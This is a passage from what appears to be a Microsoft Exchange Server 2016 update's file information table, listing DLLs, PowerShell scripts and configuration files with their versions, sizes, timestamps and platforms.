2:20| Not applicable| \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:02| x86| \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:02| x86| \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:02| x86| \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x86| \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x86| \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:02| x86| \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,184| 25-Sep-21| 7:02| x86| \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nEnableinmemorytracing.ps1| Not applicable| 13,360| 25-Sep-21| 7:03| Not applicable| \nEnable_antimalwarescanning.ps1| Not applicable| 17,555| 25-Sep-21| 7:03| Not applicable| \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,620| 25-Sep-21| 7:03| Not applicable| \nEnable_crossforestconnector.ps1| Not applicable| 18,610| 25-Sep-21| 7:03| Not applicable| \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,912| 25-Sep-21| 7:03| Not applicable| \nEnable_outsidein.ps1| Not applicable| 13,679| 25-Sep-21| 7:03| Not applicable| \nEngineupdateserviceinterfaces.dll| 15.1.2308.15| 17,784| 25-Sep-21| 7:00| x86| \nEscprint.dll| 15.1.2308.15| 20,368| 25-Sep-21| 7:02| x64| \nEse.dll| 15.1.2308.15| 3,695,504| 25-Sep-21| 7:02| x64| \nEseback2.dll| 15.1.2308.15| 325,000| 25-Sep-21| 7:02| x64| \nEsebcli2.dll| 15.1.2308.15| 292,728| 25-Sep-21| 7:02| x64| \nEseperf.dll| 15.1.2308.15| 116,088| 25-Sep-21| 7:04| x64| \nEseutil.exe| 15.1.2308.15| 398,736| 25-Sep-21| 7:03| x64| \nEsevss.dll| 15.1.2308.15| 44,432| 25-Sep-21| 7:02| x64| \nEtweseproviderresources.dll| 15.1.2308.15| 82,296| 25-Sep-21| 7:01| x64| \nEventperf.dll| 15.1.2308.15| 59,792| 25-Sep-21| 7:01| x64| \nExchange.depthtwo.types.ps1xml| Not applicable| 40,117| 25-Sep-21| 7:03| Not applicable| \nExchange.format.ps1xml| Not applicable| 648,588| 25-Sep-21| 7:03| Not applicable| \nExchange.partial.types.ps1xml| Not applicable| 43,349| 25-Sep-21| 7:03| Not applicable| \nExchange.ps1| Not applicable| 20,815| 25-Sep-21| 7:03| Not applicable| \nExchange.support.format.ps1xml| Not applicable| 26,531| 25-Sep-21| 7:01| Not applicable| \nExchange.types.ps1xml| Not applicable| 365,125| 25-Sep-21| 7:03| Not applicable| \nExchangeudfcommon.dll| 15.1.2308.15| 121,720| 25-Sep-21| 7:00| x86| \nExchangeudfs.dll| 15.1.2308.15| 269,688| 25-Sep-21| 7:01| x86| \nExchmem.dll| 15.1.2308.15| 85,888| 25-Sep-21| 7:02| x64| \nExchsetupmsg.dll| 15.1.2308.15| 19,344| 25-Sep-21| 7:03| x64| \nExchucutil.ps1| Not applicable| 23,912| 25-Sep-21| 7:03| Not applicable| \nExdbfailureitemapi.dll| Not applicable| 27,016| 25-Sep-21| 7:03| x64| \nExdbmsg.dll| 15.1.2308.15| 229,768| 25-Sep-21| 7:02| x64| \nExeventperfplugin.dll| 15.1.2308.15| 25,480| 25-Sep-21| 7:01| x64| \nExmime.dll| 15.1.2308.15| 364,920| 25-Sep-21| 7:02| x64| \nExportedgeconfig.ps1| Not applicable| 27,387| 25-Sep-21| 7:03| Not applicable| \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,554| 25-Sep-21| 7:03| Not applicable| \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,886| 25-Sep-21| 7:03| Not applicable| \nExport_outlookclassification.ps1| Not applicable| 14,390| 25-Sep-21| 7:05| Not applicable| \nExport_publicfolderstatistics.ps1| Not applicable| 23,121| 25-Sep-21| 7:03| Not applicable| \nExport_retentiontags.ps1| Not applicable| 17,040| 25-Sep-21| 7:03| Not applicable| \nExppw.dll| 15.1.2308.15| 83,336| 25-Sep-21| 7:00| x64| \nExprfdll.dll| 15.1.2308.15| 26,504| 25-Sep-21| 7:04| x64| \nExrpc32.dll| 15.1.2308.15| 1,922,952| 25-Sep-21| 7:02| x64| \nExrw.dll| 15.1.2308.15| 28,024| 25-Sep-21| 7:03| x64| \nExsetdata.dll| 15.1.2308.15| 2,779,016| 25-Sep-21| 7:02| x64| \nExsetup.exe| 15.1.2308.15| 35,216| 25-Sep-21| 7:00| x86| \nExsetupui.exe| 15.1.2308.15| 193,416| 25-Sep-21| 7:01| x86| \nExtrace.dll| 15.1.2308.15| 245,136| 25-Sep-21| 7:01| x64| \nExt_microsoft.exchange.data.transport.dll| 15.1.2308.15| 601,472| 25-Sep-21| 7:01| x86| \nExwatson.dll| 15.1.2308.15| 44,936| 25-Sep-21| 7:00| x64| \nFastioext.dll| 15.1.2308.15| 60,280| 25-Sep-21| 7:00| x64| \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 25-Sep-21| 7:03| Not applicable| \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 25-Sep-21| 7:03| Not applicable| \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 25-Sep-21| 7:03| Not applicable| \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 25-Sep-21| 7:05| Not applicable| \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 25-Sep-21| 7:05| Not applicable| \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 25-Sep-21| 7:03| Not applicable| \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 25-Sep-21| 7:03| Not applicable| \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 25-Sep-21| 7:03| Not applicable| \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 25-Sep-21| 7:05| Not applicable| \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 25-Sep-21| 7:03| Not applicable| \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 25-Sep-21| 7:03| Not applicable| \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 25-Sep-21| 7:03| Not applicable| \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 25-Sep-21| 7:03| Not applicable| \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 25-Sep-21| 7:03| Not applicable| \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 25-Sep-21| 7:03| Not applicable| \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 25-Sep-21| 7:03| Not applicable| \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 25-Sep-21| 7:03| Not applicable| \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 25-Sep-21| 7:03| Not applicable| \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 25-Sep-21| 7:05| Not applicable| \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 25-Sep-21| 7:05| Not applicable| \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 25-Sep-21| 7:03| Not applicable| \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 25-Sep-21| 7:03| Not applicable| \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 25-Sep-21| 7:03| Not applicable| \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 25-Sep-21| 7:03| Not applicable| \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 25-Sep-21| 7:05| Not applicable| \nFilteringconfigurationcommands.ps1| Not applicable| 18,263| 25-Sep-21| 7:03| Not applicable| \nFilteringpowershell.dll| 15.1.2308.15| 223,120| 25-Sep-21| 7:01| x86| \nFilteringpowershell.format.ps1xml| Not applicable| 29,660| 25-Sep-21| 7:00| Not applicable| \nFiltermodule.dll| 15.1.2308.15| 180,096| 25-Sep-21| 7:00| x64| \nFipexeuperfctrresource.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:03| x64| \nFipexeventsresource.dll| 15.1.2308.15| 44,944| 25-Sep-21| 7:01| x64| \nFipexperfctrresource.dll| 15.1.2308.15| 32,656| 25-Sep-21| 7:01| x64| \nFirewallres.dll| 15.1.2308.15| 72,584| 25-Sep-21| 7:03| x64| \nFms.exe| 15.1.2308.15| 1,350,024| 25-Sep-21| 7:03| x64| \nForefrontactivedirectoryconnector.exe| 15.1.2308.15| 110,968| 25-Sep-21| 7:03| x64| \nFpsdiag.exe| 15.1.2308.15| 18,824| 25-Sep-21| 7:03| x86| \nFsccachedfilemanagedlocal.dll| 15.1.2308.15| 822,152| 25-Sep-21| 7:00| x64| \nFscconfigsupport.dll| 15.1.2308.15| 56,720| 25-Sep-21| 7:03| x86| \nFscconfigurationserver.exe| 15.1.2308.15| 430,968| 25-Sep-21| 7:01| x64| \nFscconfigurationserverinterfaces.dll| 15.1.2308.15| 15,760| 25-Sep-21| 7:03| x86| \nFsccrypto.dll| 15.1.2308.15| 208,760| 25-Sep-21| 7:01| x64| \nFscipcinterfaceslocal.dll| 15.1.2308.15| 28,560| 25-Sep-21| 7:01| x86| \nFscipclocal.dll| 15.1.2308.15| 38,280| 25-Sep-21| 7:03| x86| \nFscsqmuploader.exe| 15.1.2308.15| 453,520| 25-Sep-21| 7:00| x64| \nGetucpool.ps1| Not applicable| 19,771| 25-Sep-21| 7:03| Not applicable| \nGetvalidengines.ps1| Not applicable| 13,270| 25-Sep-21| 7:03| Not applicable| \nGet_antispamfilteringreport.ps1| Not applicable| 15,801| 25-Sep-21| 7:03| Not applicable| \nGet_antispamsclhistogram.ps1| Not applicable| 14,651| 25-Sep-21| 7:03| Not applicable| \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,723| 25-Sep-21| 7:03| Not applicable| \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,771| 25-Sep-21| 7:03| Not applicable| \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,494| 25-Sep-21| 7:03| Not applicable| \nGet_antispamtoprblproviders.ps1| Not applicable| 14,701| 25-Sep-21| 7:03| Not applicable| \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 25-Sep-21| 7:03| Not applicable| \nGet_dleligibilitylist.ps1| Not applicable| 42,328| 25-Sep-21| 7:03| Not applicable| \nGet_exchangeetwtrace.ps1| Not applicable| 28,943| 25-Sep-21| 7:03| Not applicable| \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,022| 25-Sep-21| 7:03| Not applicable| \nGet_storetrace.ps1| Not applicable| 50,647| 25-Sep-21| 7:03| Not applicable| \nHuffman_xpress.dll| 15.1.2308.15| 32,648| 25-Sep-21| 7:03| x64| \nImportedgeconfig.ps1| Not applicable| 77,280| 25-Sep-21| 7:03| Not applicable| \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,476| 25-Sep-21| 7:03| Not applicable| \nImport_retentiontags.ps1| Not applicable| 28,830| 25-Sep-21| 7:03| Not applicable| \nInproxy.dll| 15.1.2308.15| 85,896| 25-Sep-21| 7:01| x64| \nInstallwindowscomponent.ps1| Not applicable| 34,555| 25-Sep-21| 7:03| Not applicable| \nInstall_antispamagents.ps1| Not applicable| 17,925| 25-Sep-21| 7:03| Not applicable| \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,979| 25-Sep-21| 7:03| Not applicable| \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.15| 107,400| 25-Sep-21| 7:03| Not applicable| \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.15| 20,344| 25-Sep-21| 7:01| Not applicable| \nInterop.certenroll.dll| 15.1.2308.15| 142,736| 25-Sep-21| 7:01| x86| \nInterop.licenseinfointerface.dll| 15.1.2308.15| 14,224| 25-Sep-21| 7:03| x86| \nInterop.netfw.dll| 15.1.2308.15| 34,192| 25-Sep-21| 7:01| x86| \nInterop.plalibrary.dll| 15.1.2308.15| 72,592| 25-Sep-21| 7:01| x86| \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.15| 27,016| 25-Sep-21| 7:01| Not applicable| \nInterop.taskscheduler.dll| 15.1.2308.15| 46,472| 25-Sep-21| 7:00| x86| \nInterop.wuapilib.dll| 15.1.2308.15| 60,816| 25-Sep-21| 7:01| x86| \nInterop.xenroll.dll| 15.1.2308.15| 39,800| 25-Sep-21| 7:01| x86| \nKerbauth.dll| 15.1.2308.15| 62,840| 25-Sep-21| 7:03| x64| \nLicenseinfointerface.dll| 15.1.2308.15| 643,448| 25-Sep-21| 7:01| x64| \nLpversioning.xml| Not applicable| 20,446| 25-Sep-21| 7:02| Not applicable| \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,896| 25-Sep-21| 7:04| Not applicable| \nManagedavailabilitycrimsonmsg.dll| 15.1.2308.15| 138,640| 25-Sep-21| 7:03| x64| \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,837| 25-Sep-21| 7:04| Not applicable| \nManagescheduledtask.ps1| Not applicable| 36,352| 25-Sep-21| 7:01| Not applicable| \nMce.dll| 15.1.2308.15| 1,693,064| 25-Sep-21| 7:02| x64| \nMeasure_storeusagestatistics.ps1| Not applicable| 29,483| 25-Sep-21| 7:04| Not applicable| \nMerge_publicfoldermailbox.ps1| Not applicable| 22,619| 25-Sep-21| 7:03| Not applicable| \nMicrosoft.database.isam.dll| 15.1.2308.15| 127,376| 25-Sep-21| 7:00| x86| \nMicrosoft.dkm.proxy.dll| 15.1.2308.15| 26,000| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2308.15| 68,496| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2308.15| 17,808| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.addressbook.service.dll| 15.1.2308.15| 232,848| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2308.15| 43,400| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.airsync.comon.dll| 15.1.2308.15| 1,775,496| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.airsync.dll1| 15.1.2308.15| 505,736| 25-Sep-21| 7:01| Not applicable| \nMicrosoft.exchange.airsynchandler.dll| 15.1.2308.15| 76,176| 25-Sep-21| 7:06| x86| \nMicrosoft.exchange.anchorservice.dll| 15.1.2308.15| 135,544| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2308.15| 23,432| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2308.15| 27,000| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.approval.applications.dll| 15.1.2308.15| 53,640| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.assistants.dll| 15.1.2308.15| 924,040| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2308.15| 25,976| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2308.15| 42,360| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2308.15| 14,728| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2308.15| 70,544| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2308.15| 94,600| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2308.15| 36,752| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2308.15| 15,736| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2308.15| 79,760| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.autodiscover.dll| 15.1.2308.15| 396,168| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2308.15| 21,392| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2308.15| 57,208| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2308.15| 14,736| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.batchservice.dll| 15.1.2308.15| 35,704| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.cabutility.dll| 15.1.2308.15| 276,368| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2308.15| 16,248| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2308.15| 26,000| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2308.15| 13,704| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2308.15| 23,416| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.clients.common.dll| 15.1.2308.15| 377,744| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2308.15| 83,856| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.clients.owa.dll| 15.1.2308.15| 2,970,512| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2308.15| 5,028,752| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2308.15| 894,352| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.clients.security.dll| 15.1.2308.15| 413,568| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.clients.strings.dll| 15.1.2308.15| 924,560| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2308.15| 31,608| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.cluster.common.dll| 15.1.2308.15| 52,112| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2308.15| 21,904| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2308.15| 33,672| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.cluster.replay.dll| 15.1.2308.15| 3,526,536| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2308.15| 108,432| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2308.15| 288,632| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.cluster.shared.dll| 15.1.2308.15| 623,992| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2308.15| 86,416| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2308.15| 1,827,720| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2308.15| 31,624| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2308.15| 466,304| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2308.15| 25,976| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2308.15| 38,264| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2308.15| 102,800| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2308.15| 48,528| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2308.15| 67,464| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.dll| 15.1.2308.15| 172,936| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2308.15| 113,552| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.il.dll| 15.1.2308.15| 13,712| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.inference.dll| 15.1.2308.15| 130,424| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.optics.dll| 15.1.2308.15| 63,880| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2308.15| 19,840| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2308.15| 15,248| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.search.dll| 15.1.2308.15| 107,912| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2308.15| 17,792| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.common.smtp.dll| 15.1.2308.15| 51,600| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2308.15| 36,752| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2308.15| 27,536| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2308.15| 1,042,296| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.commonmsg.dll| 15.1.2308.15| 29,072| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:01| x64| \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2308.15| 181,112| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2308.15| 30,096| 25-Sep-21| 7:00| x64| \nMicrosoft.exchange.compliance.common.dll| 15.1.2308.15| 22,416| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2308.15| 85,904| 25-Sep-21| 7:02| x64| \nMicrosoft.exchange.compliance.dll| 15.1.2308.15| 51,080| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2308.15| 37,264| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2308.15| 50,552| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2308.15| 33,144| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2308.15| 1,100,152| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2308.15| 206,712| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2308.15| 210,832| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.compression.dll| 15.1.2308.15| 17,296| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2308.15| 37,776| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2308.15| 14,216| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.configuration.core.dll| 15.1.2308.15| 145,808| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2308.15| 14,216| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2308.15| 53,120| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2308.15| 15,752| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2308.15| 23,416| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2308.15| 54,648| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2308.15| 13,712| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2308.15| 1,845,112| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2308.15| 30,072| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2308.15| 68,472| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2308.15| 15,240| 25-Sep-21| 7:03| x64| \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2308.15| 21,392| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2308.15| 26,000| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.connections.common.dll| 15.1.2308.15| 169,856| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.connections.eas.dll| 15.1.2308.15| 330,128| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.connections.imap.dll| 15.1.2308.15| 173,944| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.connections.pop.dll| 15.1.2308.15| 71,032| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2308.15| 203,656| 25-Sep-21| 7:04| x64| \nMicrosoft.exchange.context.client.dll| 15.1.2308.15| 27,000| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.context.configuration.dll| 15.1.2308.15| 51,576| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.context.core.dll| 15.1.2308.15| 51,088| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.context.datamodel.dll| 15.1.2308.15| 46,984| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.core.strings.dll| 15.1.2308.15| 1,092,472| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.core.timezone.dll| 15.1.2308.15| 57,224| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2308.15| 326,528| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2308.15| 3,357,576| 25-Sep-21| 7:03| x86| \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2308.15| 35,712| 25-Sep-21| 7:06| x64| \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2308.15| 17,792| 25-Sep-21| 7:02| x86| \nMicrosoft.exchange.data.connectors.dll| 15.1.2308.15| 165,264| 25-Sep-21| 7:00| x86| \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2308.15| 619,400| 25-Sep-21| 7:01| x86| \nMicrosoft.exchange.data.directory.dll| 15.1.2308.15| 7,786,384| 25-Sep-21| 7:03| x86| 